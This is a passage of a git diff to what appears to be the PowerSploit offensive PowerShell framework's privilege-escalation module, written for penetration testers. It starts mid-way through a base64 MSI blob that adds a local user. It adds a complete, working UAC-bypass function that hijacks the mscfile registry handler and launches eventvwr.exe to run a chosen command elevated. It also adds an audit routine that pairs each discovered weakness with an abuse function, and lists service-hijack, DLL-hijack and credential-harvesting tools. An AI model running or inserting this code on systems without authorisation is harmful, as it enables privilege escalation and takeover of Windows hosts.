LTQ4RUYtQUM1Mi1FRTgzQTFCRkJGMTF9X2lzMUJaLkNPTVBBTllOQU1FRVhFTVNJLkNPTUJaLklOU1RBTExfU1VDQ0VTU19DT0RFUzBCWi5GSVhFRF9JTlNUQUxMX0FSR1VNRU5UUy9TSUxFTlQgQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5GSVhFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlOT05FX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUJBU0lDX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJRlVMTF9VTklOU1RBTExfQVJHVU1FTlRTYnouU2V0dXBTaXplMjMyOTYwTWFudWZhY3R1cmVyUHJvZHVjdENvZGV7MjcxQkJDRUQtRjM2QS00RThFLUE1NzYtOTQ1NUYwQ0EwMUE4fVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZU1TSSBXcmFwcGVyIFRlbXBsYXRlUHJvZHVjdFZlcnNpb24xLjAuMC4we0NDMDM1QzE4LTBGQzctNDcwOC04ODA2LUQ0QjA5MUU1OUFBN31TZWN1cmVDdXN0b21Qcm9wZXJ0aWVzV0lYX0RPV05HUkFERV9ERVRFQ1RFRDtXSVhfVVBHUkFERV9ERVRFQ1RFRFNPRlRXQVJFXFtCWi5DT01QQU5ZTkFNRV1cTVNJIFdyYXBwZXJcSW5zdGFsbGVkXFtCWi5XUkFQUEVEX0FQUElEXUxvZ29uVXNlcltMb2dv' try { [System.Convert]::FromBase64String( $Binary ) | Set-Content -Path $Path -Encoding Byte @@ -3743,268 +4579,411 @@ function Write-UserAddMSI { $Out = New-Object PSObject $Out | Add-Member Noteproperty 'OutputPath' $Path + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.UserAddMSI') $Out } catch { Write-Warning "Error while writing to location '$Path': $_" - $Out = New-Object PSObject - $Out | Add-Member Noteproperty 'OutputPath' $_ - $Out } } -function Invoke-AllChecks { +function Invoke-EventVwrBypass { <# - .SYNOPSIS - - Runs all functions that check for various Windows privilege escalation opportunities. - - Author: @harmj0y - License: BSD 3-Clause - - .PARAMETER HTMLReport +.SYNOPSIS - Switch. Write a HTML version of the report to SYSTEM.username.html. +Bypasses UAC by performing an image hijack on the .msc file extension +Only tested on Windows 7 and Windows 10 - .EXAMPLE +Author: Matt Nelson (@enigma0x3) +License: BSD 3-Clause +Required Dependencies: None - PS C:\> Invoke-AllChecks +.PARAMETER Command - Runs all escalation checks and outputs a status report for discovered issues. + Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " - .EXAMPLE +.EXAMPLE - PS C:\> Invoke-AllChecks -HTMLReport +Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" - Runs all escalation checks and outputs a status report to SYSTEM.username.html - detailing any discovered issues. +This will write out "Is Elevated: True" to C:\UACBypassTest. #> - [CmdletBinding()] - Param( + [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] + Param ( + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Command, + [Switch] - $HTMLReport + $Force ) + $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin + $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop - if($HTMLReport) { - $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html" - - $Header = "" - - ConvertTo-HTML -Head $Header -Body "

PowerUp report for '$($Env:ComputerName).$($Env:UserName)'

" | Out-File $HtmlReportFile + if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){ + "UAC is set to 'Always Notify'. This module does not bypass this setting." + exit } + else{ + #Begin Execution + $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" + $Command = $pshome + '\' + $Command + #Add in the new registry entries to hijack the msc file + if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ + New-Item $mscCommandPath -Force | + New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null + }else{ + Write-Warning "Key already exists, consider using -Force" + exit + } - # initial admin checks + if (Test-Path $mscCommandPath) { + Write-Verbose "Created registry entries to hijack the msc extension" + }else{ + Write-Warning "Failed to create registry key, exiting" + exit + } - "`n[*] Running Invoke-AllChecks" + $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' + #Start Event Viewer + if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { + $Process = Start-Process -FilePath $EventvwrPath -PassThru + Write-Verbose "Started eventvwr.exe" + } - $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + #Sleep 5 seconds + Write-Verbose "Sleeping 5 seconds to trigger payload" + if (-not $PSBoundParameters['WhatIf']) { + Start-Sleep -Seconds 5 + } - if($IsAdmin){ - "[+] Current user already has local administrative privileges!" + $mscfilePath = "HKCU:\Software\Classes\mscfile" - if($HTMLReport) { - ConvertTo-HTML -Head $Header -Body "

User Has Local Admin Privileges!

" | Out-File -Append $HtmlReportFile + if (Test-Path $mscfilePath) { + #Remove the registry entry + Remove-Item $mscfilePath -Recurse -Force + Write-Verbose "Removed registry entries" } - } - else{ - "`n`n[*] Checking if user is in a local group with administrative privileges..." - $CurrentUserSids = Get-CurrentUserTokenGroupSid | Select-Object -ExpandProperty SID - if($CurrentUserSids -contains 'S-1-5-32-544') { - "[+] User is in a local group that grants administrative privileges!" - "[+] Run a BypassUAC attack to elevate privileges to admin." - - if($HTMLReport) { - ConvertTo-HTML -Head $Header -Body "

User In Local Group With Administrative Privileges

" | Out-File -Append $HtmlReportFile - } + if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ + Stop-Process -Id $Process.Id + Write-Verbose "Killed running eventvwr process" } } +} - # Service checks +function Invoke-PrivescAudit { +<# +.SYNOPSIS - "`n`n[*] Checking for unquoted service paths..." - $Results = Get-ServiceUnquoted - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Unquoted Service Paths

" | Out-File -Append $HtmlReportFile - } +Executes all functions that check for various Windows privilege escalation opportunities. - "`n`n[*] Checking service executable and argument permissions..." - $Results = Get-ModifiableServiceFile - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Service File Permissions

" | Out-File -Append $HtmlReportFile - } +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - "`n`n[*] Checking service permissions..." - $Results = Get-ModifiableService - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Modifiable Services

" | Out-File -Append $HtmlReportFile - } +.DESCRIPTION +Executes all functions that check for various Windows privilege escalation opportunities. - # DLL hijacking +.PARAMETER Format - "`n`n[*] Checking %PATH% for potentially hijackable DLL locations..." - $Results = Find-PathDLLHijack - $Results | Where-Object {$_} | Foreach-Object { - $AbuseString = "Write-HijackDll -DllPath '$($_.ModifiablePath)\wlbsctrl.dll'" - $_ | Add-Member Noteproperty 'AbuseFunction' $AbuseString - $_ - } | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

%PATH% .dll Hijacks

" | Out-File -Append $HtmlReportFile - } +String. Format to decide on what is returned from the command, an Object Array, List, or HTML Report. +.PARAMETER HTMLReport - # registry checks +DEPRECATED - Switch. Write a HTML version of the report to SYSTEM.username.html. +Superseded by the Format parameter. - "`n`n[*] Checking for AlwaysInstallElevated registry key..." - if (Get-RegistryAlwaysInstallElevated) { - $Out = New-Object PSObject - $Out | Add-Member Noteproperty 'AbuseFunction' "Write-UserAddMSI" - $Results = $Out +.EXAMPLE - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

AlwaysInstallElevated

" | Out-File -Append $HtmlReportFile - } - } +Invoke-PrivescAudit - "`n`n[*] Checking for Autologon credentials in registry..." - $Results = Get-RegistryAutoLogon - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Registry Autologons

" | Out-File -Append $HtmlReportFile - } +Runs all escalation checks and outputs a status report for discovered issues. +.EXAMPLE - "`n`n[*] Checking for modifidable registry autoruns and configs..." - $Results = Get-ModifiableRegistryAutoRun - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Registry Autoruns

" | Out-File -Append $HtmlReportFile - } +Invoke-PrivescAudit -Format HTML - # other checks +Runs all escalation checks and outputs a status report to SYSTEM.username.html +detailing any discovered issues. - "`n`n[*] Checking for modifiable schtask files/configs..." - $Results = Get-ModifiableScheduledTaskFile - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Modifidable Schask Files

" | Out-File -Append $HtmlReportFile - } +#> - "`n`n[*] Checking for unattended install files..." - $Results = Get-UnattendedInstallFile - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Unattended Install Files

" | Out-File -Append $HtmlReportFile - } + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [ValidateSet('Object','List','HTML')] + [String] + $Format = 'Object', + [Switch] + $HTMLReport + ) - "`n`n[*] Checking for encrypted web.config strings..." - $Results = Get-Webconfig | Where-Object {$_} - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Encrypted 'web.config' String

" | Out-File -Append $HtmlReportFile - } + if($HTMLReport){ $Format = 'HTML' } - "`n`n[*] Checking for encrypted application pool and virtual directory passwords..." - $Results = Get-ApplicationHost | Where-Object {$_} - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Encrypted Application Pool Passwords

" | Out-File -Append $HtmlReportFile + if ($Format -eq 'HTML') { + $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html" + $Header = "" + ConvertTo-HTML -Head $Header -Body "

PowerUp report for '$($Env:ComputerName).$($Env:UserName)'

" | Out-File $HtmlReportFile } - "`n`n[*] Checking for plaintext passwords in McAfee SiteList.xml files...." - $Results = Get-SiteListPassword | Where-Object {$_} - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

McAfee's SiteList.xml's

" | Out-File -Append $HtmlReportFile - } - "`n" + Write-Verbose "Running Invoke-PrivescAudit" + + $Checks = @( + # Initial admin checks + @{ + Type = 'User Has Local Admin Privileges' + Command = { if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){ New-Object PSObject } } + }, + @{ + Type = 'User In Local Group with Admin Privileges' + Command = { if ((Get-ProcessTokenGroup | Select-Object -ExpandProperty SID) -contains 'S-1-5-32-544'){ New-Object PSObject } } + AbuseScript = { 'Invoke-WScriptUACBypass -Command "..."' } + }, + @{ + Type = 'Process Token Privileges' + Command = { Get-ProcessTokenPrivilege -Special | Where-Object {$_} } + }, + # Service checks + @{ + Type = 'Unquoted Service Paths' + Command = { Get-UnquotedService } + }, + @{ + Type = 'Modifiable Service Files' + Command = { Get-ModifiableServiceFile } + }, + @{ + Type = 'Modifiable Services' + Command = { Get-ModifiableService } + }, + # DLL hijacking + @{ + Type = '%PATH% .dll Hijacks' + Command = { Find-PathDLLHijack } + AbuseScript = { "Write-HijackDll -DllPath '$($_.ModifiablePath)\wlbsctrl.dll'" } + }, + # Registry checks + @{ + Type = 'AlwaysInstallElevated Registry Key' + Command = { if (Get-RegistryAlwaysInstallElevated){ New-Object PSObject } } + AbuseScript = { 'Write-UserAddMSI' } + }, + @{ + Type = 'Registry Autologons' + Command = { Get-RegistryAutoLogon } + }, + @{ + Type = 'Modifiable Registry Autorun' + Command = { Get-ModifiableRegistryAutoRun } + }, + # Other checks + @{ + Type = 'Modifiable Scheduled Task Files' + Command = { Get-ModifiableScheduledTaskFile } + }, + @{ + Type = 'Unattended Install Files' + Command = { Get-UnattendedInstallFile } + }, + @{ + Type = 'Encrypted web.config Strings' + Command = { Get-WebConfig | Where-Object {$_} } + }, + @{ + Type = 'Encrypted Application Pool Passwords' + Command = { Get-ApplicationHost | Where-Object {$_} } + }, + @{ + Type = 'McAfee SiteList.xml files' + Command = { Get-SiteListPassword | Where-Object {$_} } + }, + @{ + Type = 'Cached GPP Files' + Command = { Get-CachedGPPPassword | Where-Object {$_} } + } + ) - "`n`n[*] Checking for cached Group Policy Preferences .xml files...." - $Results = Get-CachedGPPPassword | Where-Object {$_} - $Results | Format-List - if($HTMLReport) { - $Results | ConvertTo-HTML -Head $Header -Body "

Cached GPP Files

" | Out-File -Append $HtmlReportFile + ForEach($Check in $Checks){ + Write-Verbose "Checking for $($Check.Type)..." + $Results = . $Check.Command + $Results | Where-Object {$_} | ForEach-Object { + $_ | Add-Member Noteproperty 'Check' $Check.Type + if ($Check.AbuseScript){ + $_ | Add-Member Noteproperty 'AbuseFunction' (. $Check.AbuseScript) + } + } + switch($Format){ + Object { $Results } + List { "`n`n[*] Checking for $($Check.Type)..."; $Results | Format-List } + HTML { $Results | ConvertTo-HTML -Head $Header -Body "

$($Check.Type)

" | Out-File -Append $HtmlReportFile } + } } - "`n" - if($HTMLReport) { - "[*] Report written to '$HtmlReportFile' `n" + if ($Format -eq 'HTML') { + Write-Verbose "[*] Report written to '$HtmlReportFile' `n" } } # PSReflect signature specifications $Module = New-InMemoryModule -ModuleName PowerUpModule +# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', '', Scope='Function')] $FunctionDefinitions = @( - (func kernel32 GetCurrentProcess ([IntPtr]) @()) - (func advapi32 OpenProcessToken ([Bool]) @( [IntPtr], [UInt32], [IntPtr].MakeByRefType()) -SetLastError) + (func kernel32 GetCurrentProcess ([IntPtr]) @()), + (func kernel32 OpenProcess ([IntPtr]) @([UInt32], [Bool], [UInt32]) -SetLastError), + (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError), + (func advapi32 OpenProcessToken ([Bool]) @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) -SetLastError) (func advapi32 GetTokenInformation ([Bool]) @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32].MakeByRefType()) -SetLastError), (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), + (func advapi32 LookupPrivilegeName ([Int]) @([IntPtr], [IntPtr], [String].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), (func advapi32 QueryServiceObjectSecurity ([Bool]) @([IntPtr], [Security.AccessControl.SecurityInfos], [Byte[]], [UInt32], [UInt32].MakeByRefType()) -SetLastError), (func advapi32 ChangeServiceConfig ([Bool]) @([IntPtr], [UInt32], [UInt32], [UInt32], [String], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) -SetLastError -Charset Unicode), - (func advapi32 CloseServiceHandle ([Bool]) @([IntPtr]) -SetLastError) + (func advapi32 CloseServiceHandle ([Bool]) @([IntPtr]) -SetLastError), + (func ntdll RtlAdjustPrivilege ([UInt32]) @([Int32], [Bool], [Bool], [Int32].MakeByRefType())) ) # https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ $ServiceAccessRights = psenum $Module PowerUp.ServiceAccessRights UInt32 @{ - QueryConfig = '0x00000001' - ChangeConfig = '0x00000002' - QueryStatus = '0x00000004' - EnumerateDependents = '0x00000008' - Start = '0x00000010' - Stop = '0x00000020' - PauseContinue = '0x00000040' - Interrogate = '0x00000080' - UserDefinedControl = '0x00000100' - Delete = '0x00010000' - ReadControl = '0x00020000' - WriteDac = '0x00040000' - WriteOwner = '0x00080000' - Synchronize = '0x00100000' - AccessSystemSecurity = '0x01000000' - GenericAll = '0x10000000' - GenericExecute = '0x20000000' - GenericWrite = '0x40000000' - GenericRead = '0x80000000' - AllAccess = '0x000F01FF' + QueryConfig = '0x00000001' + ChangeConfig = '0x00000002' + QueryStatus = '0x00000004' + EnumerateDependents = '0x00000008' + Start = '0x00000010' + Stop = '0x00000020' + PauseContinue = '0x00000040' + Interrogate = '0x00000080' + UserDefinedControl = '0x00000100' + Delete = '0x00010000' + ReadControl = '0x00020000' + WriteDac = '0x00040000' + WriteOwner = '0x00080000' + Synchronize = '0x00100000' + AccessSystemSecurity = '0x01000000' + GenericAll = '0x10000000' + GenericExecute = '0x20000000' + GenericWrite = '0x40000000' + GenericRead = '0x80000000' + AllAccess = '0x000F01FF' } -Bitfield $SidAttributes = psenum $Module PowerUp.SidAttributes UInt32 @{ - SE_GROUP_ENABLED = '0x00000004' - SE_GROUP_ENABLED_BY_DEFAULT = '0x00000002' - SE_GROUP_INTEGRITY = '0x00000020' - SE_GROUP_INTEGRITY_ENABLED = '0xC0000000' - SE_GROUP_MANDATORY = '0x00000001' - SE_GROUP_OWNER = '0x00000008' - SE_GROUP_RESOURCE = '0x20000000' - SE_GROUP_USE_FOR_DENY_ONLY = '0x00000010' + SE_GROUP_MANDATORY = '0x00000001' + SE_GROUP_ENABLED_BY_DEFAULT = '0x00000002' + SE_GROUP_ENABLED = '0x00000004' + SE_GROUP_OWNER = '0x00000008' + SE_GROUP_USE_FOR_DENY_ONLY = '0x00000010' + SE_GROUP_INTEGRITY = '0x00000020' + SE_GROUP_RESOURCE = '0x20000000' + SE_GROUP_INTEGRITY_ENABLED = '0xC0000000' +} -Bitfield + +$LuidAttributes = psenum $Module PowerUp.LuidAttributes UInt32 @{ + DISABLED = '0x00000000' + SE_PRIVILEGE_ENABLED_BY_DEFAULT = '0x00000001' + SE_PRIVILEGE_ENABLED = '0x00000002' + SE_PRIVILEGE_REMOVED = '0x00000004' + SE_PRIVILEGE_USED_FOR_ACCESS = '0x80000000' } -Bitfield +$SecurityEntity = psenum $Module PowerUp.SecurityEntity UInt32 @{ + SeCreateTokenPrivilege = 1 + SeAssignPrimaryTokenPrivilege = 2 + SeLockMemoryPrivilege = 3 + SeIncreaseQuotaPrivilege = 4 + SeUnsolicitedInputPrivilege = 5 + SeMachineAccountPrivilege = 6 + SeTcbPrivilege = 7 + SeSecurityPrivilege = 8 + SeTakeOwnershipPrivilege = 9 + SeLoadDriverPrivilege = 10 + SeSystemProfilePrivilege = 11 + SeSystemtimePrivilege = 12 + SeProfileSingleProcessPrivilege = 13 + SeIncreaseBasePriorityPrivilege = 14 + SeCreatePagefilePrivilege = 15 + SeCreatePermanentPrivilege = 16 + SeBackupPrivilege = 17 + SeRestorePrivilege = 18 + SeShutdownPrivilege = 19 + SeDebugPrivilege = 20 + SeAuditPrivilege = 21 + SeSystemEnvironmentPrivilege = 22 + SeChangeNotifyPrivilege = 23 + SeRemoteShutdownPrivilege = 24 + SeUndockPrivilege = 25 + SeSyncAgentPrivilege = 26 + SeEnableDelegationPrivilege = 27 + SeManageVolumePrivilege = 28 + SeImpersonatePrivilege = 29 + SeCreateGlobalPrivilege = 30 + SeTrustedCredManAccessPrivilege = 31 + SeRelabelPrivilege = 32 + SeIncreaseWorkingSetPrivilege = 33 + SeTimeZonePrivilege = 34 + SeCreateSymbolicLinkPrivilege = 35 +} + $SID_AND_ATTRIBUTES = struct $Module PowerUp.SidAndAttributes @{ Sid = field 0 IntPtr Attributes = field 1 UInt32 } +$TOKEN_TYPE_ENUM = psenum $Module PowerUp.TokenTypeEnum UInt32 @{ + Primary = 1 + Impersonation = 2 +} + +$TOKEN_TYPE = struct $Module PowerUp.TokenType @{ + Type = field 0 $TOKEN_TYPE_ENUM +} + +$SECURITY_IMPERSONATION_LEVEL_ENUM = psenum $Module PowerUp.ImpersonationLevelEnum UInt32 @{ + Anonymous = 0 + Identification = 1 + Impersonation = 2 + Delegation = 3 +} + +$IMPERSONATION_LEVEL = struct $Module PowerUp.ImpersonationLevel @{ + ImpersonationLevel = field 0 $SECURITY_IMPERSONATION_LEVEL_ENUM +} + $TOKEN_GROUPS = struct $Module PowerUp.TokenGroups @{ GroupCount = field 0 UInt32 Groups = field 1 $SID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 32) } +$LUID = struct $Module PowerUp.Luid @{ + LowPart = field 0 $SecurityEntity + HighPart = field 1 Int32 +} + +$LUID_AND_ATTRIBUTES = struct $Module PowerUp.LuidAndAttributes @{ + Luid = field 0 $LUID + Attributes = field 1 UInt32 +} + +$TOKEN_PRIVILEGES = struct $Module PowerUp.TokenPrivileges @{ + PrivilegeCount = field 0 UInt32 + Privileges = field 1 $LUID_AND_ATTRIBUTES.MakeArrayType() -MarshalAs @('ByValArray', 50) +} + $Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'PowerUp.NativeMethods' $Advapi32 = $Types['advapi32'] $Kernel32 = $Types['kernel32'] +$NTDll = $Types['ntdll'] + +Set-Alias Get-CurrentUserTokenGroupSid Get-ProcessTokenGroup +Set-Alias Invoke-AllChecks Invoke-PrivescAudit diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index 867c7ec1..bcd2443c 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 @@ -10,7 +10,7 @@ ModuleVersion = '3.0.0.0' GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' # Author of this module -Author = 'Will Schroeder' +Author = 'Will Schroeder (@harmj0y)' # Copyright statement for this module Copyright = 'BSD 3-Clause' @@ -23,38 +23,40 @@ PowerShellVersion = '2.0' # Functions to export from this module FunctionsToExport = @( - 'Add-ServiceDacl', - 'Find-PathDLLHijack', - 'Find-ProcessDLLHijack', - 'Get-ApplicationHost', - 'Get-CachedGPPPassword', - 'Get-CurrentUserTokenGroupSid', 'Get-ModifiablePath', - 'Get-ModifiableRegistryAutoRun', - 'Get-ModifiableScheduledTaskFile', - 'Get-ModifiableService', + 'Get-ProcessTokenGroup', + 'Get-ProcessTokenPrivilege', + 'Enable-Privilege', + 'Add-ServiceDacl', + 'Set-ServiceBinaryPath', + 'Test-ServiceDaclPermission', + 'Get-UnquotedService', 'Get-ModifiableServiceFile', - 'Get-RegistryAlwaysInstallElevated', - 'Get-RegistryAutoLogon', + 'Get-ModifiableService', 'Get-ServiceDetail', - 'Get-ServiceUnquoted', - 'Get-SiteListPassword', - 'Get-System', - 'Get-UnattendedInstallFile', - 'Get-Webconfig', - 'Install-ServiceBinary', - 'Invoke-AllChecks', 'Invoke-ServiceAbuse', + 'Write-ServiceBinary', + 'Install-ServiceBinary', 'Restore-ServiceBinary', - 'Set-ServiceBinPath', - 'Test-ServiceDaclPermission', + 'Find-ProcessDLLHijack', + 'Find-PathDLLHijack', 'Write-HijackDll', - 'Write-ServiceBinary', - 'Write-UserAddMSI' + 'Get-RegistryAlwaysInstallElevated', + 'Get-RegistryAutoLogon', + 'Get-ModifiableRegistryAutoRun', + 'Get-ModifiableScheduledTaskFile', + 'Get-UnattendedInstallFile', + 'Get-WebConfig', + 'Get-ApplicationHost', + 'Get-SiteListPassword', + 'Get-CachedGPPPassword', + 'Write-UserAddMSI', + 'Invoke-EventVwrBypass', + 'Invoke-PrivescAudit', + 'Get-System' ) # List of all files packaged with this module FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md' } - diff --git a/Privesc/README.md b/Privesc/README.md index d5b499c3..ac161d83 100644 --- a/Privesc/README.md +++ b/Privesc/README.md @@ -27,13 +27,18 @@ Required Dependencies: None Optional Dependencies: None -### Service Enumeration: - Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config Get-ModifiableService - returns services the current user can modify Get-ServiceDetail - returns detailed information about a specified service - -### Service Abuse: + Set-ServiceBinaryPath - sets the binary path for a service to a specified value Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command @@ -45,7 +50,7 @@ Optional Dependencies: None Write-HijackDll - writes out a hijackable DLL ### Registry Checks: - Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set Get-RegistryAutoLogon - checks for Autologon credentials in the registry Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns @@ -59,9 +64,6 @@ Optional Dependencies: None ### Other Helpers/Meta-Functions: Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify - Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not - Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service - Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods - Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set Write-UserAddMSI - write out a MSI installer that prompts for a user to be added - Invoke-AllChecks - runs all current escalation checks and returns a report + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/README.md b/README.md index c348b9e1..3871bcef 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,5 @@ +## This project is no longer supported + ### PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: ## CodeExecution @@ -36,7 +38,7 @@ Compresses, Base-64 encodes, and outputs generated code to load a managed dll in Encrypts text files/scripts. -#### `Remove-Comments` +#### `Remove-Comment` Strips comments and extra whitespace from a script. @@ -132,7 +134,7 @@ Displays Windows vault credential objects including cleartext web credentials. Generates a full-memory minidump of a process. -#### 'Get-MicrophoneAudio' +#### `Get-MicrophoneAudio` Records audio from system microphone and saves to disk diff --git a/Recon/Get-ComputerDetails.ps1 b/Recon/Get-ComputerDetail.ps1 similarity index 90% rename from Recon/Get-ComputerDetails.ps1 rename to Recon/Get-ComputerDetail.ps1 index bd00deb9..ef3720cc 100644 --- a/Recon/Get-ComputerDetails.ps1 +++ b/Recon/Get-ComputerDetail.ps1 @@ -1,14 +1,14 @@ -function Get-ComputerDetails +function Get-ComputerDetail { <# .SYNOPSIS This script is used to get useful information from a computer. -Function: Get-ComputerDetails -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None +Function: Get-ComputerDetail +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -25,14 +25,14 @@ Switch: Outputs the data as text instead of objects, good if you are using this .EXAMPLE -Get-ComputerDetails +Get-ComputerDetail Gets information about the computer and outputs it as PowerShell objects. -Get-ComputerDetails -ToString +Get-ComputerDetail -ToString Gets information about the computer and outputs it as raw text. .NOTES -This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. +This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. .LINK @@ -42,6 +42,7 @@ Github repo: https://github.com/clymb3r/PowerShell #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] Param( [Parameter(Position=0)] [Switch] @@ -50,14 +51,12 @@ Github repo: https://github.com/clymb3r/PowerShell Set-StrictMode -Version 2 - - $SecurityLog = Get-EventLog -LogName Security - $Filtered4624 = Find-4624Logons $SecurityLog - $Filtered4648 = Find-4648Logons $SecurityLog - $AppLockerLogs = Find-AppLockerLogs + $Filtered4624 = Find-4624Logon $SecurityLog + $Filtered4648 = Find-4648Logon $SecurityLog + $AppLockerLogs = 